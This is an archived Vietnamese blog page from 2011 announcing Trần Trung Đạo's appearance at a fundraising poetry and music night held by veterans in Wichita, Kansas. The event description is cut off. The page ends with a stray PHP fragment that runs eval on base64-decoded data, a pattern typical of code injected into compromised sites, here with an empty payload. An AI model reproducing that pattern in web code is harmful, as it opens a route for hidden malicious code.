Archive for March 30th, 2011

Trần Trung Đạo tại Wichita, Kansas 26 tháng 3, 2011

Trần Trung Đạo tại Wichita, Kansas 26 tháng 3, 2011

Tiệc Tân Niên và Đêm Thơ Nhạc do Hội Cựu Quân Nhân và Chiến Sĩ VNCH Wichita, Kansas tổ chức Nhằm mục đích gây quỹ để yểm trợ cho công tác xây dựng tượng đài chiến sĩ Việt Mỹ tại thành phố Wichita và đồng thời để tạo cơ h

03.30.2011 | Nhận Xét |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>